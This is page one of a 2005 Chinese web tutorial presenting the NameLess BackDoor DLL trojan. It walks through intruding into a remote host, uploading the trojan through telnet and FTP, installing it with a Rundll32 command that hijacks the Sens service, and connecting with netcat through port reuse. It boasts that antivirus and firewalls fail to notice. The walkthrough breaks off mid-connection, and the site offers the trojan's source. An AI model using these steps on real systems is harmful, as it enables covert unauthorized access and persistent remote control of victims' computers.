文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术防范措施死杀毒软件 逼疯防火墙—新兴木马NameLess BackDoor复仇记
精品推荐
特别推荐
·分布式拒绝服务攻击(DDoS)原理及防范
·通过防火墙来堵住VPN安全漏洞
·针对DDOS部署有效防御措施
·专家谈企业防火墙的安全防护配置
·防火墙的实际功能差异鉴别方法
·教你如何正确设置帐户锁定选项
·分析称主动防御安全技术尚存技术缺陷
·保护用户计算机远离黑客骚扰九大策略
·三层交换机安全策略预防病毒
·详解IP地址盗用常用方法及防范
·计算机病毒防治常遇问题
·解读防火墙日志记录 防范网络攻击
·轻松方便 三招两式抵制IE的顽固病毒
·怎么样清除能突破主动防御的新型木马
·网络安全专家支招防范黑客攻击九大方法
·配置防火墙和Web代理客户的访问
·个人计算机防范黑客的九大绝招
·入侵检测 浅谈安全扫描软件的检测技术
·教你九招防范黑客的简单办法
·安全专家支招防范黑客攻击九大方法
热点TOP10
·无线攻防:破解WEP密钥过程全解
·局域网上网的安全防范与技巧
·网络安全专家支招防范黑客攻击九大方法
·保护用户计算机远离黑客骚扰九大策略
·专家谈企业防火墙的安全防护配置
·分析称主动防御安全技术尚存技术缺陷
·三层交换机安全策略预防病毒
·开启瑞星防火墙不能上网问题解决
·计算机病毒防治常遇问题
·轻松方便 三招两式抵制IE的顽固病毒
·怎么样清除能突破主动防御的新型木马
·教你如何正确设置帐户锁定选项
·应用程序访问权限完全攻略
·瑞星个人防火墙安装与使用详解
·端口大全及端口关闭方法
·百炼成钢-打磨你的Outpost防火墙
·SYN flood攻击的原理及其防御
·防御局域网攻击 ZT
·个人电脑防御黑客攻击的绝招
·Tpvo/3783 病毒的分析和防治

死杀毒软件 逼疯防火墙—新兴木马NameLess BackDoor复仇记

日期:2005年10月31日 作者: 查看:[大字体 中字体 小字体]


编者:文中提到的NameLess
最新1.4版本源码本站有下载
NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。
说起NameLess
BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess
BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess
BackDoor又去除了各处的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS
服务
等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。
NameLess BackDoor实战演练
将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。
一、随风潜入夜——安装
下载NameLess
BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。
怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统
漏洞
,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP
服务
器,通过FTP
服务
器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!
在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):
Click to Open in New Window

Rundll32 NameLess.dll,Install
执行该命令后后门就被安装成功了,后门会
自动
替换系统
服务
Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。
小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。
二、穿墙细无声——连接
安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。
小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess
BackDoor在连接后门时使用了端口复用
技术
,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。
我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:
nc
-l -p 12345
命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):
Click to Open in New Window

nc 192.168.1.11 139
建立连接后输入如下内容(如图3):
Click to Open in New Window

[1] [2] 下一页 




上一篇:几个易被误认为病毒的文件

下一篇:变态传文件法(比tftp,ftp,iget.vbe都爽的)

死杀毒软件 逼疯防火墙—新兴木马NameLess BackDoor复仇记 相关文章:
·Windows系统漏洞修复软件大比拼
·揭秘木马是如何盗取QQ密码的
·红警2:尤里的复仇无限尤里改
·警惕高危木马病毒 随意下载病毒窃密码
·十大最成功国产软件排行
·慧眼识金 四款智能选股软件显身手
·不用任何软件(木马程序)盗取账号密码
·vista分区软件
·远程控制软件pcAnywhere10.0试用手记
·大智慧股票软件Level-2入门手册
死杀毒软件 逼疯防火墙—新兴木马NameLess BackDoor复仇记 相关软件:
·红色警戒2 尤里的复仇中文版
·整形模拟软件_非常face V1.0
·颐家IDO在线互动设计软件
·诺顿杀毒软件+诺顿防火墙免费破解版 免注册永远自动升级
·WisMencoder(视频压缩、转换软件)V1.99 正式版
·手机SIM卡备份一卡多号(手机魔卡)万能读写软件V9.0
·Nero 7 中文破解版 EXE 经典光盘刻软件,应求见查看
·统计软件SAS教程
·西门子plc软件及教程 文件类型 其它介绍
·商讯通-客户管理软件

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot